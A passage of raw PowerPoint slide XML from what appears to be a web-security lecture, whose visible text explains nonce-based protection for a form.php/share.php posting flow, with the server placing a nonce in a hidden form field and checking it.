                    <a:pt x="47259" y="47259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79906" y="22032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118430" y="5764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161289" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667510" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710369" y="5764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748893" y="22032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781540" y="47259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806767" y="79906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823035" y="118430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="161289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="564514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="806450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823035" y="849353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806767" y="887889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781540" y="920527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748893" y="945736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710369" y="961983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667510" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15621" y="1331518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161289" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118430" y="961983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79906" y="945736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47259" y="920527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22032" y="887889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5764" y="849353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="806450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="564514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="161289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417563" y="3875531"/>
            <a:ext cx="1794933" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="60958" marR="6773" indent="-44872">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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2447035" y="450638"/>
            <a:ext cx="7299960" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1485883"/>
            <a:ext cx="10745893" cy="4081586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="82125" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Recall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> expected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> flow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="3940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> shown</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355">
              <a:lnSpc>
                <a:spcPts val="3940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-1267" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(th</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-1287" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eque</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t)</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="3967"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>assents,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-1300" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355">
              <a:lnSpc>
                <a:spcPts val="3967"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>makes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>actual</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> post</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:lnSpc>
                <a:spcPts val="4305"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nonce, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>includes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-887" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-1387" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chec</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
